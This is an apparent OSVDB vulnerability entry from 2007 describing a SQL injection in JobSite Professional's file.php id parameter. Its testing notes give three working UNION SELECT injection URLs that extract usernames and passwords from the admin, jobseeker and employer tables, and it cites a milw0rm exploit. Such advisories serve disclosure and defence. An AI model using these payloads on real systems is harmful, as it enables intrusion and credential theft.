JobSite Professional file.php id Variable SQL Injection

2007-10-29T00:00:00
ID OSVDB:38284
Type osvdb
Reporter OSVDB
Modified 2007-10-29T00:00:00

Description

Manual Testing Notes

http://[target]/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/ http://[target]/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/ http://[target]/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*

References:

Secunia Advisory ID:27443 Other Advisory URL: http://milw0rm.com/exploits/4576